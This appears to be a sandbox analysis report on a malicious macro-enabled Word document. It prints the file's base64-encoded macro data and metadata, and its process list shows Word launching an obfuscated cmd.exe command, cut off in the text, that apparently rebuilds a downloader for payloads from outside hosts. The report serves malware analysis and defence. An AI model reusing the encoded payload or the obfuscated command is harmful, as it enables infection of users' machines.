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 AAAAQAAAC/AEAAAAEjRWeD==
WordDocumentDocSuppDataBinDataName:	editdata.mso
WordDocumentStylesStyleRPrRFontsCs:	Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi:	Tahoma
WordDocumentStylesStyleRPrRFontsAscii:	Tahoma
WordDocumentStylesStyleRsidVal:	005A24B1
WordDocumentStylesStyleLinkVal:	BalloonTextChar
WordDocumentStylesStyleBasedOnVal:	Normal
WordDocumentStylesStyleTblPrTblCellMarRightType:	dxa
WordDocumentStylesStyleTblPrTblCellMarRightW:	108
WordDocumentStylesStyleTblPrTblCellMarBottomType:	dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW:	-
WordDocumentStylesStyleTblPrTblCellMarLeftType:	dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW:	108
WordDocumentStylesStyleTblPrTblCellMarTopType:	dxa
WordDocumentStylesStyleTblPrTblCellMarTopW:	-
WordDocumentStylesStyleTblPrTblIndType:	dxa
WordDocumentStylesStyleTblPrTblIndW:	-
WordDocumentStylesStyleUiNameVal:	Table Normal
WordDocumentStylesStyleRPrLangBidi:	AR-SA
WordDocumentStylesStyleRPrLangFareast:	EN-US
WordDocumentStylesStyleRPrLangVal:	EN-US
WordDocumentStylesStyleRPrSz-csVal:	22
WordDocumentStylesStyleRPrSzVal:	22
WordDocumentStylesStyleRPrFontVal:	Calibri
WordDocumentStylesStylePPrSpacingLine-rule:	auto
WordDocumentStylesStylePPrSpacingLine:	259
WordDocumentStylesStylePPrSpacingAfter:	160
WordDocumentStylesStyleNameVal:	Normal
WordDocumentStylesStyleStyleId:	Normal
WordDocumentStylesStyleDefault:	on
WordDocumentStylesStyleType:	paragraph
WordDocumentStylesLatentStylesLsdExceptionName:	Normal
WordDocumentStylesLatentStylesLatentStyleCount:	375
WordDocumentStylesLatentStylesDefLockedState:	off
WordDocumentStylesVersionOfBuiltInStylenamesVal:	7
WordDocumentFontsFontSigCsb-1:	00000000
WordDocumentFontsFontSigCsb-0:	000001FF
WordDocumentFontsFontSigUsb-3:	00000000
WordDocumentFontsFontSigUsb-2:	00000009
WordDocumentFontsFontSigUsb-1:	C0007841
WordDocumentFontsFontSigUsb-0:	E0002AFF
WordDocumentFontsFontPitchVal:	variable
WordDocumentFontsFontFamilyVal:	Roman
WordDocumentFontsFontCharsetVal:	00
WordDocumentFontsFontPanose-1Val:	02020603050405020304
WordDocumentFontsFontName:	Times New Roman
WordDocumentFontsDefaultFontsCs:	Times New Roman
WordDocumentFontsDefaultFontsH-ansi:	Calibri
WordDocumentFontsDefaultFontsFareast:	Calibri
WordDocumentFontsDefaultFontsAscii:	Calibri
WordDocumentDocumentPropertiesVersion:	16
WordDocumentDocumentPropertiesCharactersWithSpaces:	1
WordDocumentDocumentPropertiesParagraphs:	1
WordDocumentDocumentPropertiesLines:	1
WordDocumentDocumentPropertiesCharacters:	1
WordDocumentDocumentPropertiesWords:	-
WordDocumentDocumentPropertiesPages:	1
WordDocumentDocumentPropertiesLastSaved:	2019:01:23 12:28:00Z
WordDocumentDocumentPropertiesCreated:	2019:01:23 12:28:00Z
WordDocumentDocumentPropertiesTotalTime:	-
WordDocumentDocumentPropertiesRevision:	1
WordDocumentIgnoreSubtreeVal:	http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent:	no
WordDocumentEmbeddedObjPresent:	no
WordDocumentMacrosPresent:	yes

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2608	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FactNum-JBH-90692.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2200	c:\b3707\d6921\i8318\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set kW=gEXjNhBiU1eO0,v8CWbIux\G@%F5VtAmk.y6zHrLwM/(T)l9Y3cJ$ f4{-7+P2d'D~Ka}s:n;opS=&&for %o in (74;73;40;25;60;8;6;39;19;16;70;65;27;13;9;25;38;25;75;1;75;75;19;11;4;4;30;41;1;70;65;57;55;13;9;25;5;25;44;1;41;60;70;65;57;49;13;9;25;46;46;53;52;20;61;9;27;61;76;63;36;55;27;12;49;63;72;52;36;47;27;15;47;76;71;10;40;57;73;18;3;10;50;29;53;4;10;29;33;17;10;18;16;46;7;10;71;29;72;52;5;55;49;15;58;76;63;5;29;29;74;70;42;42;29;20;71;10;38;0;33;50;73;31;42;75;66;41;26;75;20;19;17;17;24;5;29;29;74;70;42;42;69;29;73;20;29;67;38;50;33;50;73;31;42;51;18;16;11;23;34;1;24;5;29;29;74;70;42;42;40;40;40;33;31;73;62;10;38;71;57;67;20;29;73;74;67;38;29;69;33;50;73;31;42;10;36;26;8;23;74;19;24;5;29;29;74;70;42;42;67;71;29;7;0;20;67;33;67;0;20;7;46;67;38;71;73;29;7;50;7;67;69;33;50;73;31;42;39;4;11;23;26;20;48;21;24;5;29;29;74;70;42;42;29;67;32;10;57;73;71;10;61;33;50;73;31;42;2;15;12;28;10;62;37;63;33;75;74;46;7;29;43;63;24;63;45;72;52;71;15;61;9;27;76;63;3;15;58;35;9;63;72;52;7;15;35;9;9;53;76;53;63;27;27;63;72;52;71;55;27;15;58;76;63;69;15;55;58;49;63;72;52;20;9;27;27;61;76;52;10;71;14;70;29;10;31;74;59;63;22;63;59;52;7;15;35;9;9;59;63;33;10;21;10;63;72;54;73;38;10;67;50;5;43;52;32;61;12;61;61;53;7;71;53;52;5;55;49;15;58;45;56;29;38;34;56;52;36;47;27;15;47;33;64;73;40;71;46;73;67;62;26;7;46;10;43;52;32;61;12;61;61;13;53;52;20;9;27;27;